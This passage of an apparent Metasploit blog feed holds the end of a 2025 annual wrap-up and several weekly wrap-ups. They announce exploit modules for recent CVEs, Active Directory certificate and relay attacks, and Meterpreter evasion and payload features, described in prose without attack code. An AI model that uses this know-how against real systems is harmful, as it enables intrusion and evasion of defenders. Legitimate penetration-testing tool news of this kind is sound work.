ESC16. Checks for these misconfigured certificate templates were integrated into the existing ldap_esc_vulnerable_template module, allowing users to easily identify misconfigured templates during assessments.</p><p>To complement this detection capability, we introduced the new esc_update_ldap_object module, which enables reliable exploitation of these vulnerable templates to escalate privileges. ESC9, ESC10, and ESC16 share a common pattern: each requires control of a user account with write privileges over another user that is permitted to enroll in the vulnerable template. While exploiting these techniques with other tools typically involves multiple manual and error-prone steps, the new module streamlines the entire workflow. 
Users configure the required datastore options, run the module, and receive a certificate that can be used to escalate privileges within the domain.</p><p>As part of this effort, we also introduced the ldap_object_attribute module, which provides standard CRUD operations for manipulating LDAP objects in Active Directory. This module — along with existing functionality such as shadow_credentials and get_ticket — is used internally by esc_update_ldap_object to abstract away low-level LDAP interactions and simplify exploitation.</p><p>This work included comprehensive documentation covering the configuration of templates vulnerable to ESC9, ESC10, and ESC16, as well as detailed instructions for exploiting each technique using the new module.</p><h3>Active Directory Improvements</h3><p>Related to the AD CS improvements, new low-level functionality was added for interacting with Active Directory (AD) Domain Controllers over LDAP. Over the past couple of years, Metasploit has seen multiple modules added that facilitate AD attack workflows, including <a href="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/ldap/shadow_credentials.md">Shadow Credentials</a>, <a href="https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/rbcd.html">RBCD</a>, <a href="https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html">Unconstrained Delegation</a>, etc. Like the AD CS attacks, many of these techniques depend on access control to some degree. Over the summer, Metasploit introduced <a href="https://github.com/rapid7/metasploit-framework/pull/20345">new functionality</a> to facilitate checking for these types of attacks. This new library provides Active Directory-specific functionality, most notably the ability to remotely evaluate security descriptors to determine whether a particular user or group has a specific access right. 
This has already been incorporated into the following modules to either enable or improve the existing detection capabilities:</p><ul><li>auxiliary/admin/ldap/shadow_credentials</li><li>auxiliary/admin/ldap/rbcd</li><li>auxiliary/admin/ldap/ad_cs_cert_template</li><li>auxiliary/gather/ldap_esc_vulnerable_cert_finder</li></ul><p>For module authors, the library provides a composable API for determining if an object grants a particular permission to an optional SID. The SID can be either a user or group, and when omitted is automatically set to the authenticating user, i.e. the check then applies to the permissions of the current connection.</p><p>For example, check if the object grants the read and write property permissions with:</p><p><span data-type='inlineCode'>adds_obj_grants_permissions?(@ldap, obj, SecurityDescriptorMatcher::Allow.all(%i[RP WP]))</span></p><h2>Code Cleanup At Scale</h2><p>Beyond new features and modules, 2025 also saw substantial code quality improvements thanks to community contributor bcoles, who took on the often-thankless task of resolving RuboCop violations across the codebase. Throughout the year, bcoles systematically worked through older modules, cleaning up style inconsistencies, fixing syntax violations, and converting outdated property types to proper boolean values in auxiliary scanners and exploit modules. This kind of incremental maintenance work—fixing redundant parentheses here, resolving style violations there—doesn't make for flashy headlines, but it keeps the codebase maintainable and makes life easier for everyone working in the framework. Code quality matters, and we're grateful to bcoles for putting in the work to keep Metasploit's technical debt in check.</p><h2>Payload Improvements</h2><p>It may be a fun fact, or perhaps tribal knowledge, that an “exploit” to Metasploit is a module that delivers a payload. All the great exploit content this year would be nothing without corresponding payloads to deliver, and we make sure that those get plenty of our time as well. 
The following changes in particular are highly impactful and may have gone unnoticed while the flashier exploits received all the attention.</p><h3>Windows Meterpreter Improvements</h3><p>The biggest updates for the Windows Meterpreter revolve around two major improvements. The first is the upgrade to ReflectiveDLLInjection, made by Alex (xaitax) Hagenah, for which we express our gratitude for improving this area of the Metasploit Framework that requires a high level of attention to detail. This update introduces full, production-ready ARM64 support and a comprehensive architectural modernization of the whole library. These changes open the door to future support for a native ARM64 Meterpreter on Windows. The second is that Metasploit split the standard API extension for Windows this year. This was actually the design used in the original Meterpreter implementation, and we’ve reconsidered the monolithic approach. This improvement is one of several steps we have in the pipeline to improve the evasion capabilities of our Windows Meterpreter. The standard API library now allows the user to load only specific subcomponents of the extension (for example, the component for network or file-system interaction), reducing the in-memory footprint exposed to memory scanners. To leverage this new functionality, set <span data-type='inlineCode'>AutoLoadStdapi</span> to False, and then load one or more extensions manually, e.g. <span data-type='inlineCode'>load stdapi_fs</span>. To maintain backwards compatibility, a single stdapi extension is also still available and can be loaded with <span data-type='inlineCode'>load stdapi</span>.</p><h3>Fetch Payload Improvements</h3><p>The first milestone was the introduction of fileless execution for Linux fetch payloads, enabling payloads to run directly from memory using anonymous files. This advancement greatly enhances operational stealth by minimizing forensic traces and avoiding file-based detection, with careful attention to safe, opt-in behavior and collaborative code refinement. 
Following this, the FETCH_PIPE option streamlined payload deployment into a single, compact command. This improvement enhanced both usability and evasion, while also allowing larger, more complex command payloads (such as fileless execution) to be executed even where the command size is reduced. Additionally, fetch payload support has expanded to seven additional CPU architectures: aarch64, armbe, armle, mipsbe, mipsle, ppc, and ppc64le. This significantly broadens Metasploit's reach across embedded and legacy systems. Both features are thoroughly tested and future-proof, making the framework more versatile and powerful.</p><h3>Basic Support for New Architectures</h3><p>This year, we have also updated the framework to support new basic payloads. We have introduced the exec payload for Windows ARM64 (provided by Alex (xaitax) Hagenah), and reverse shell payloads for RISC-V 32-bit and 64-bit and for Loongarch64 (both provided by bcoles).</p><h3>COMING SOON</h3><p>As much as we try, not everything fits into one year. With that in mind, we wanted to highlight some upcoming features that we’re particularly excited to complete in the coming months.</p><h4>Malleable C2</h4><p>Malleable C2 will allow the user to supply a .profile describing how the HTTP requests between Meterpreter and metasploit-framework should look, allowing Metasploit to hide the distinctive traffic generated by session communication.</p><h4>Direct Syscall in Metsrv</h4><p>We have updated the Meterpreter core (metsrv) to remove common static signatures, such as specific strings and function imports, making it harder to detect.</p><h4>PoolParty for 32-bit systems</h4><p>Additional work is underway to port the PoolParty injection to native 32-bit systems. Huge thanks to xHector1337 for taking over the research and extension of the code injection for the new architecture.</p><h2>SCCM Modules</h2><p>This year, Metasploit added two modules for targeting SCCM instances and recovering the Network Access Account credentials. 
These modules differ in how they perform the authentication. The first, auxiliary/admin/sccm/get_naa_credentials, accepts credentials from the operator and will use them to authenticate and run the attack on demand. This pairs nicely with the auxiliary/admin/dcerpc/samr_account module when the operator can create a new machine account. However, when that’s not an option, Metasploit still has you covered with the auxiliary/server/relay/relay_get_naa_credentials variant, which enables relaying NTLM authentication from an SMB server. These attack workflows were demonstrated at Black Hat and DEF CON over the summer, and we anticipate they’ll remain useful in the future.</p><h2>Module Highlights</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20713">CVE-2025-9316, CVE-2025-11700 N-able N-Central XXE</a> – N-able N-Central is a popular Remote Monitoring and Management (RMM) platform. These two vulnerabilities, when combined, enable Metasploit to read local files without authenticating. This can be used to obtain a number of sensitive backup files from the application itself, or anything else on the host system. XXE attacks are a less common vulnerability, at least in Metasploit-land, but this is a fantastic example of how impactful they can be.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20112">CVE-2025-22457 Ivanti Connect Secure Unauthenticated RCE</a> – Ivanti RCEs are always valuable, and this module shows that memory corruption lives on in 2025. Not only is this exploit unauthenticated and reliable, it is a great example of how ROP chains can be used.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/19897">CVE-2024-55555 Invoice Ninja RCE</a> – This particular module leverages a PHP deserialization vulnerability within the application. While this vulnerability requires knowledge of the APP_KEY, successful exploitation could have significant financial implications. 
As an added bonus, this module came with a new library adding support for Laravel Framework-specific cryptography methods.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/19950">CVE-2024-55556 InvoiceShelf RCE</a> – Everyone loves a good pairing, and this module continues h00die-gr3y’s work on invoicing software, showing that they’re useful for receiving more than just payments.</li><li>LDAP Password Disclosure – This module has been around for a while, but received some new features in 2025 for targeting Active Directory Domain Controllers. The <a href="https://github.com/rapid7/metasploit-framework/pull/20017">first</a> added support for LAPSv1 and v2, enabling the module to recover the local admin account on systems. Later in the year, a <a href="https://github.com/rapid7/metasploit-framework/pull/20401">second</a> improvement added support for gMSA accounts. This module also pairs nicely with the new <a href="https://github.com/rapid7/metasploit-framework/pull/19832">SMB to LDAP NTLM Relay</a> module we added this year as well.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20409">Microsoft SharePoint ToolPane Unauthenticated RCE (CVE-2025-53770 and CVE-2025-53771)</a></li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20060">Exploit module for CVE-2025-32433 (Erlang/OTP)</a></li></ul><h3>SMB Relay Expansion</h3><p>This year, Metasploit significantly leveled up its relaying capabilities, transforming the framework’s only SMB to SMB relay capability into a powerful engine for lateral movement. 
Traditionally, SMB relaying was often the domain of standalone external tools, but through the dedicated work of the Metasploit team, these workflows are now seamlessly integrated into the framework:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/19832">SMB to LDAP relay module</a></li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20637">SMB to MSSQL NTLM Relay module</a></li></ul><h2>Community Stats Recap</h2><p>A huge thank you from the entire Metasploit team to all 66 contributors in 2025. Your contributions and ideas are what continue to improve this tool every year. Notably, 41 of these were first-time contributors who added new code.</p><p>Here are some stats for 2025:</p><ul><li>Number of new modules: 139</li><li>Number of new bug fixes: 133</li><li>Number of new enhancements: 115</li><li>Number of new documentation additions: 19</li><li>Number of new payload enhancements: 18</li></ul><p>Contributors in 2025 (ordered by count):</p><ul><li>bcoles</li><li>h00die</li><li>Chocapikk</li><li>h00die-gr3y</li><li>Takahiro-Yoko</li><li>h4x-x0r</li><li>smashery</li><li>vognik (new in 2025)</li><li>jvoisin</li><li>xHector1337 (new in 2025)</li><li>jmartin-tech</li><li>mariomontecatine (new in 2025)</li><li>blue0x1 (new in 2025)</li><li>nakkouchtarek (new in 2025)</li><li>molecula2788</li><li>xaitax</li><li>happybear-21 (new in 2025)</li><li>e2002e</li><li>fabpiaf (new in 2025)</li><li>mekhalleh</li><li>JohannesLks (new in 2025)</li><li>BitTheByte (new in 2025)</li><li>todb</li><li>00nx (new in 2025)</li><li>DevBuiHieu (new in 2025)</li><li>SweilemCodes (new in 2025)</li><li>arpitjain099 (new in 2025)</li><li>L-codes</li><li>Zeecka (new in 2025)</li><li>aaryan-11-x</li><li>whotwagner</li><li>lafried (new in 2025)</li><li>sebaspf (new in 2025)</li><li>hantwister (new in 2025)</li><li>tastyrce (new in 2025)</li><li>easymoney322 (new in 2025)</li><li>gardnerapp</li><li>TheBigStonk (new in 
2025)</li><li>0xAryan (new in 2025)</li><li>sempervictus</li><li>szymonj99</li><li>Mathiou04</li><li>vultza (new in 2025)</li><li>enty8080 (new in 2025)</li><li>SaiSakthidar (new in 2025)</li><li>Zedeldi (new in 2025)</li><li>stfnw (new in 2025)</li><li>mmacfadden (new in 2025)</li><li>daffainfo (new in 2025)</li><li>HamzaSahin61 (new in 2025)</li><li>survivant (new in 2025)</li><li>uhei</li><li>EchoSl0w (new in 2025)</li><li>jeffmcjunkin</li><li>BenoitDePaoli (new in 2025)</li><li>randomstr1ng</li><li>2tunnels (new in 2025)</li><li>rodolphopivetta (new in 2025)</li><li>RakRakGaming (new in 2025)</li><li>Desiree05 (new in 2025)</li><li>Wopseeion (new in 2025)</li><li>jphamgithub (new in 2025)</li><li>H4k1l (new in 2025)</li><li>fishBone000 (new in 2025)</li><li>xl4635 (new in 2025)</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-2025-annual-wrap-up</link>
      <guid isPermaLink="false">blt8410ea0709abb3b7</guid>
      <category><![CDATA[Metasploit]]></category><dc:creator><![CDATA[Spencer McIntyre]]></dc:creator>
      <pubDate>Mon, 05 Jan 2026 20:31:31 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0475760a2990dfd7/6849ab41a770d7563190a3ea/metasploit-fence.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 12/19/2025]]></title>
      <description><![CDATA[<h2>React2Shell Payload Improvements</h2><p>Last week Metasploit released an exploit for the React2Shell vulnerability, and this week we have made a couple of improvements to the payloads that it uses. The first improvement affects all Metasploit modules. When an exploit is used, an initial payload is selected using some basic logic that effectively picked the first compatible payload in alphabetical order. Now Metasploit will prefer a default of x86 Meterpreters for Windows systems (since 32-bit payloads work on both 32-bit and 64-bit versions of Windows) and x64 Meterpreters for all other platforms, including Linux. In the context of React2Shell, this means the payload now defaults to x64 for Linux instead of AARCH64.</p><p>Another improvement that only affects this exploit was the change of the default payload to one leveraging Node.js, which is more likely to be present than the wget binary that was previously required. These defaults should help users get started with this high-impact exploit more easily, but of course any compatible payload can still be selected.</p><p>Stay tuned for the Metasploit annual wrap-up and roadmap announcement coming up!</p><h2>New module content (2)</h2><h3>N-able N-Central Authentication Bypass and XXE Scanner</h3><p>Authors: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> and Zach Hanley (Horizon3.ai) </p><p>Type: Auxiliary </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20713">#20713</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: <span data-type='inlineCode'>scanner/http/nable_ncentral_auth_bypass_xxe</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-11700&amp;referrer=blog">CVE-2025-11700</a></p><p>Description: This adds an auxiliary module that exploits two CVEs affecting N-able N-Central. 
The first is CVE-2025-9316, an unauthenticated session bypass; the second is CVE-2025-11700, an XXE (XML External Entity) vulnerability. The module combines both vulnerabilities to achieve unauthenticated file read on affected N-Central instances (versions &lt; 2025.4.0.9).</p><h3>Grav CMS Twig SSTI Authenticated Sandbox Bypass RCE</h3><p>Author: Tarek Nakkouch </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20749">#20749</a> contributed by <a href="https://github.com/nakkouchtarek">nakkouchtarek</a> </p><p>Path: <span data-type='inlineCode'>multi/http/grav_twig_ssti_sandbox_bypass_rce</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-66301&amp;referrer=blog">CVE-2025-66301</a></p><p>Description: This adds an exploit module for a Server-Side Template Injection (SSTI) vulnerability (CVE-2025-66294) in Grav CMS, versions prior to 1.8.0-beta.27, that allows bypassing the Twig sandbox to achieve remote code execution. To inject the malicious payload into a form's process section, this module leverages CVE-2025-66301, a broken access control flaw in the /admin/pages/{page_name} endpoint.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20424">#20424</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - Updates how vulnerabilities and services are reported by adding a resource field to both models. It also adds a parents field to make layered services possible. 
An optional resource field can now be provided, and the existing service field has been updated to also accept an options hash.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20771">#20771</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates Metasploit's default payload selection logic to prefer x86 payloads over AARCH64 payloads.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20773">#20773</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This updates the exploit for React2Shell with a better default payload.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with <span data-type='inlineCode'>msfupdate</span>, and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-12-10T17%3A05%3A19Z..2025-12-17T23%3A32%3A14Z%22">Pull Requests 6.4.102...6.4.103</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.102...6.4.103">Full diff 6.4.102...6.4.103</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025</link>
      <guid isPermaLink="false">blt6746f989407cb892</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Spencer McIntyre]]></dc:creator>
      <pubDate>Fri, 19 Dec 2025 21:02:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0d50271a40a5f14f/6849ab419621d9f3824d5017/metasploit-sky.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 12/12/2025]]></title>
      <description><![CDATA[<h2>React2shell Module</h2><p>As you may have heard, on December 3, 2025, the React team announced a critical Remote Code Execution (RCE) vulnerability in servers using the React Server Components (RSC) Flight protocol. The vulnerability, tracked as <a href="https://attackerkb.com/assessments/0a808ee6-5df2-443a-a634-813dc0946305">CVE-2025-55182</a>, carries a CVSS score of 10.0 and is informally known as "React2Shell". It allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted multipart requests with "proto", "constructor", or "prototype" as module names. We're happy to announce that community contributor <a href="https://github.com/vognik">vognik</a> submitted an exploit module for React2Shell, which landed earlier this week and is included in this week's release.</p><h2>MSSQL Improvements</h2><p>Over the past couple of weeks, Metasploit has made a couple of key improvements to the framework’s MSSQL attack capabilities. The first (<a href="https://github.com/rapid7/metasploit-framework/pull/20637">PR 20637</a>) is a new NTLM relay module, <span data-type='inlineCode'>auxiliary/server/relay/smb_to_mssql</span>, which enables users to start a malicious SMB server that will relay authentication attempts to one or more target MSSQL servers. When successful, the Metasploit operator will have an interactive session to the MSSQL server that can be used to run interactive queries or MSSQL auxiliary modules.</p><p>Building on this work, it became clear that users would need to interact with MSSQL servers that require encryption, as many do in hardened environments. To achieve that objective, <a href="https://github.com/rapid7/metasploit-framework/issues/18745">issue 18745</a> was closed by updating Metasploit's MSSQL protocol library to offer better encryption support. Now, Metasploit users can open interactive sessions to servers that offer and even require encrypted connections. 
This functionality is available automatically in the <span data-type='inlineCode'>auxiliary/scanner/mssql/mssql_login</span> and new <span data-type='inlineCode'>auxiliary/server/relay/smb_to_mssql</span> modules.</p><h2>New module content (5)</h2><h3>Magento SessionReaper</h3><p>Authors: Blaklis, Tomais Williamson, and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20725">#20725</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: <span data-type='inlineCode'>multi/http/magento_sessionreaper</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-54236&amp;referrer=blog">CVE-2025-54236</a></p><p>Description: This adds a new exploit module for CVE-2025-54236 (SessionReaper), a critical vulnerability in Magento/Adobe Commerce that allows unauthenticated remote code execution. The vulnerability stems from improper handling of nested deserialization in the payment method context, combined with an unauthenticated file upload endpoint.</p><h3>Unauthenticated RCE in React and Next.js</h3><p>Authors: Lachlan Davidson, Maksim Rogov, and maple3142 </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20760">#20760</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a> </p><p>Path: <span data-type='inlineCode'>multi/http/react2shell_unauth_rce_cve_2025_55182</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-66478&amp;referrer=blog">CVE-2025-66478</a></p><p>Description: This adds an exploit for CVE-2025-55182, which is an unauthenticated RCE in React. 
This vulnerability has been referred to as React2Shell.</p><h3>WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE</h3><p>Authors: Peter Thaleikis and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20746">#20746</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: <span data-type='inlineCode'>multi/http/wp_king_addons_privilege_escalation</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-8489&amp;referrer=blog">CVE-2025-8489</a></p><p>Description: This adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload.</p><h3>Linux Reboot</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20682">#20682</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: <span data-type='inlineCode'>linux/loongarch64/reboot</span></p><p>Description: This extends our payload support to a new architecture, LoongArch64. 
The first payload introduced for this new architecture is the reboot payload, which will cause the target system to restart once triggered.</p><h2>Enhanced Modules (2)</h2><p>Modules which have either been enhanced, or renamed:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20736">#20736</a> from <a href="https://github.com/sfewer-r7">sfewer-r7</a> - This pull request updates the exploit/linux/http/fortinet_fortiweb_rce module (added in <a href="https://github.com/rapid7/metasploit-framework/pull/20717">https://github.com/rapid7/metasploit-framework/pull/20717</a>) to add support for older versions of FortiWeb (6.*), which are no longer supported by the vendor.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20747">#20747</a> from <a href="https://github.com/vognik">vognik</a> - This adds an exploit for <a href="https://github.com/advisories/GHSA-fv66-9v8q-g76r">CVE-2025-55182</a>, which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.</li></ul><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20704">#20704</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - The module auxiliary/scanner/ssh/ssh_login_pubkey has been removed. 
Its functionality has been moved into auxiliary/scanner/ssh/ssh_login.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with <span data-type='inlineCode'>msfupdate</span>, and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-12-05T16%3A17%3A18Z..2025-12-10T17%3A05%3A19Z%22">Pull Requests 6.4.101...6.4.102</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.101...6.4.102">Full diff 6.4.101...6.4.102</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-12-12-2025</link>
      <guid isPermaLink="false">blt2b9aa8b6e09307c3</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Spencer McIntyre]]></dc:creator>
      <pubDate>Fri, 12 Dec 2025 20:38:50 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7464fe659cab8a01/6852c358419e54d8e21c3458/blog-metasploit-wrap-up-.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 12/05/2025]]></title>
      <description><![CDATA[<h2>Twonky Auth Bypass, RCEs and RISC-V Reverse Shell Payloads</h2><p>This was another fantastic week in terms of PR contributions to the Metasploit Framework. Rapid7’s very own Ryan Emmons recently disclosed CVE-2025-13315 and CVE-2025-13316, which exist in Twonky Server and allow admin credentials to be recovered by reading, without authentication, the logs that contain them and then decrypting them. The auxiliary module Ryan submitted, which exploits both of these CVEs, was released this week. Community contributor Valentin Lobstein aka Chocapikk has returned to the PR queue with a welcomed vengeance. Two modules from Chocapikk were landed this week: a Monsta FTP downloadFile Remote Code Execution module along with a WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE module. In addition to some awesome module content, community contributor bcoles added Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.</p><h2>New module content (5)</h2><h3>Twonky Server Log Leak Authentication Bypass</h3><p>Author: remmons-r7 </p><p>Type: Auxiliary </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20709">#20709</a> contributed by <a href="https://github.com/remmons-r7">remmons-r7</a> </p><p>Path: gather/twonky_authbypass_logleak </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-13316&amp;referrer=blog">CVE-2025-13316</a></p><p>Description: This module exploits two CVEs: CVE-2025-13315 and CVE-2025-13316. Both CVEs exist in Twonky Server and allow admin credentials to be recovered by reading, without authentication, the logs that contain them. 
Then, using the hardcoded keys, the module decrypts those credentials.</p><h3>Monsta FTP downloadFile Remote Code Execution</h3><p>Authors: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a>, msutovsky-r7, and watchTowr Labs </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20718">#20718</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: multi/http/monsta_ftp_downloadfile_rce </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-34299&amp;referrer=blog">CVE-2025-34299</a></p><p>Description: This adds a module for CVE-2025-34299. The module exploits a vulnerability in the downloadFile action which allows an attacker to make Monsta FTP connect to a malicious FTP server and download arbitrary files to arbitrary locations on the Monsta FTP server.</p><h3>WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE</h3><p>Authors: Emiliano Versini, Khaled Alenazi (Nxploited), Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a>, and dledda-r7 </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20720">#20720</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: multi/http/wp_ai_engine_mcp_rce </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-11749&amp;referrer=blog">CVE-2025-11749</a></p><p>Description: This adds a new exploit module for an unauthenticated vulnerability in the WordPress AI Engine plugin, which has over 100,000 active installations. The vulnerability allows an attacker to create an administrator account via the MCP (Model Context Protocol) endpoint without authentication, then upload and execute a malicious plugin to achieve remote code execution. 
The vulnerability is being tracked as CVE-2025-11749.</p><h3>Linux Command Shell, Reverse TCP Inline</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> and modexp </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20712">#20712</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: linux/riscv32le/shell_reverse_tcp</p><p>Description: This adds Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.</p><h3>Linux Command Shell, Reverse TCP Inline</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> and modexp </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20712">#20712</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: linux/riscv64le/shell_reverse_tcp</p><p>Description: This adds Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.</p><h2>Enhancements and features (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20658">#20658</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This adds a number of accuracy enhancements to the ldap_esc_vulnerable_cert_finder module. It also adds a CertificateAuthorityRhost datastore option to the esc_update_ldap_object module so the operator can specify an IP Address explicitly in cases where the hostname cannot be resolved via DNS.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20677">#20677</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This enables sessions to MSSQL servers that require encryption. 
These changes add a new MsTds::Channel which leverages Rex's socket abstraction to facilitate the necessary encapsulation for the TLS negotiation.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20741">#20741</a> from <a href="https://github.com/SaiSakthidar">SaiSakthidar</a> - This removes CAIN as an output format for collected hashes.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-11-27T00%3A33%3A37Z..2025-12-05T16%3A17%3A18Z%22">Pull Requests 6.4.100...6.4.101</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.100...6.4.101">Full diff 6.4.100...6.4.101</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-12-05-2025</link>
      <guid isPermaLink="false">bltdb99a221b8d25cb7</guid>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category>
      <category><![CDATA[Metasploit]]></category><dc:creator><![CDATA[Jack Heysel]]></dc:creator>
